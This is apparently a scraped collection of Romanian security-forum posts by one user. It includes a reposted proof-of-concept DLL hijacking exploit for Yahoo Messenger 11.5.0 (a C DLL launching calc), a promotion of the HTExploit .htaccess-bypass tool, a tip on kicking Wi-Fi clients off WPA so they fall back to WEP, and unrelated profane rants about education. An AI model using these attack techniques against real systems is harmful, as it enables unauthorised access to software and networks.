co4ie

Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh Version: 11.5.0228-us Tested on: windows XP Sp3 ENG --------------------------------------------------------- # Vulnerable: yahoomessenger.exe --------------------------------------------------------- # Vulnerable extensions: .ymg --------------------------------------------------------- # Vulnerable Dll: d3d10.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Sursa

Discutam discutii... Un singur lucru ma bucura pe mine ... Copii vostri, cei din aceasta discutie care stiu si constientizeaza marile probleme din sistem, o sa ajunga sus ... sus tare (exceptand copii atomici). Daca parintii sunt constienti de mediul inconjurator si isi vor creste odraslele cu mentalitatea si ideile din acest thread ... sunt 99% sigur ca vor fi printre cei mai buni ! Educatia se face acasa nu la scoala ... acolo inveti nu esti educat si daca nu esti educat nu poti invata !! Sistemul educational din romania nu o sa ajunga niciodata nicaieri pt ca sunt prea putini profesori care sa te faca sa iti doresti sa inveti ... care sa te indrume si sa te ajute sa evoluezi!

Filmul acesta il dau eu exemplu ori de cate ori pot... si sunt sigur ca la un moment dat acolo se va ajunge!! Cat despre sistemul de invatamant... daca profesorii nu vor fi platiti calumea, nu vor da examene peste examene peste examene in fiecare an pentru a demonstra ca nu ocupa catedra degeaba, daca elevii nu vor fi si ei la randul lor examinati la sange si plevele scuipate ca pe o masea stricata si daca nu se va introduce un sistem diferentiat de invatamant in functie de capacitatile reale ale elevului (nu banii lu taticu in buzunarul directorului) nu o sa ajungem nicaieri ! Eu ii consider vinovati in principal pe profesori !! Ei sunt cei ca la sfarsitul anului dau 5-ul ca de...sa nu strice viitorul idiotului ... Si sincer m-am bucurat enorm cand am vazut ca au picat 50%+ din cretini la bac si sper sa pice si mai multi si sa fie din ce in ce mai greu pt ca, vorba lu basescu, mai avem nevoie si de ospatari si de lustruitori de pantofi!! Pentru cine invata si merita ...tot ce e mai bun... pentru restu ... la lopata mai baieti ca autostrazile nu se construiesc singure !!

Da ..., dar dupa parerea mea nu merita ... am avut 4.0 si 4.0.4 pe Galaxy S si din pacate daca nu e oficial (nu ca alea ar merge mai bine) au o gramada de bug-uri, se blocheaza , pica semnalul si nu au toate functiile (la 4.0.4 nu iti vede cardul cand il conectezi la pc & shit) ... Eu am ramas la 2.3.5 momentan pana se rezolva problemele ...

@FreddieTux: Merci mult... nu belisem ochii destul de bine !!

Eu o sa sun maine... pe mine chiar ma intereseaza masterul asta !! O sa revin cu informatii pt ca pe site nu scrie cand se fac inscrierile pentru anul asta!! Merci mult pentru cursuri !!

Copile ... eu am trecut de bac, cand tu nu aveai nici buletin ... vezi poate ai treaba si eu te tin de vorba !!

@gh551: Din pacate nu avem un thread "True Stuff" asa ca ai face bine sa te abtii de ma comentarii !!

CMSPwner v1 - Hack Wordpress CODE Un Shell Foarte Interesant !!

Eu tot nu inteleg ce treaba are topicul asta cu un forum de securitate ... ... In pula mea nu mai faceti tutoriale tampite cum sa faci puncte la solitaire ca va ia mama dracului !! In felul asta n-o sa invatati niciodata nimic ... puneti mana pe o carte in pula mea si mai lasati TheWar.Ro si alte cacaturi de genul ... ca asa picati bacul si ajungeti sa sugeti pula la rand la somaj !!!

HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process. By using this tool anyone would be able to list the contents of a directory protected this way, bypassing the authentication process. The tool provides modularity, by allowing the tester to fully perform an analysis on the protected website of the following attacks: SQL Injection, Local File Inclusion, Remote File Inclusion and others. The main characteristic of this tool is that all of the analyses performed are done inside the protected directory, not from the publicly accessible site. Features: Multiples modules to execute. Save the output to an specify directory. HTML Reporting. Use multiples wordlist to probe against htaccess bypassing. Mode verbose for a full detailed information. Presented @ Blackhat Arsenal 2012 Download Sursa BTW .. I`m Back !!

@bruttus139: De obicei cand lumea se conecteaza pe WPA si au si WEP activ il dai afara de pe retea... pur si simplu ca in atacurile asupra retelelor WPA il dai afara de pe retea pana il disperi atat de mult incat se conecteaza pe WEP ! La mine functioneaza aproape de fiecare data...

http://www.youtube.com/watch?v=Y0UjXU7fjDk

Cred ca ar fi o varianta mai buna sa se faca prezentarile pe skype (cu optiunea share desktop) tw sau ceva de genul... Se vede ce face respectivul pe pc ... in cazul in care trebuie sa arate ce face si se poate si discuta liber se pot pune intrebari ... etc. Cu Penetration Testing cu Backtrack, wireless exploitation , metasploit si webapp pentesting pot ajuta eu ... chiar daca nu sunt foarte avansat cred ca stiu destule sa pot explica procesele...

mysql -u username -p create database -bazadate- use -bazadate- source bazadate.sql

http://www.youtube.com/watch?v=6wIhWWgoye8&feature=related

Poza facuta azi la Mall Baneasa ... Se pare ca neamul prost ajunge departe !!

And The Video http://www.youtube.com/watch?v=MeSSwKffj9o

Salut baieti... Am si eu nevoie de o aplicatie web vulnerabila la sqli preferabil union based simplu... Ma intereseaza site-ul cu totul si baza de date pt proiectul de licenta (text, poze & shit vor fi modificate)!! Ce am eu este prea complicat si nici timp sa scriu o aplicatie de la 0 nu am Care dintre voi face o fapta buna si ma ajuta? Licenta trebuie sa o predau vineri maxim deci va rog sa intelegeti urgenta Merci mult !! // Fara comentarii inutile !! // Orice site este binevenit ... cu cat mai simplu cu atat mai bine !! // Detaliile pe privat va rog !

'Da Fuck?

http://www.youtube.com/watch?v=b2qfZesr11s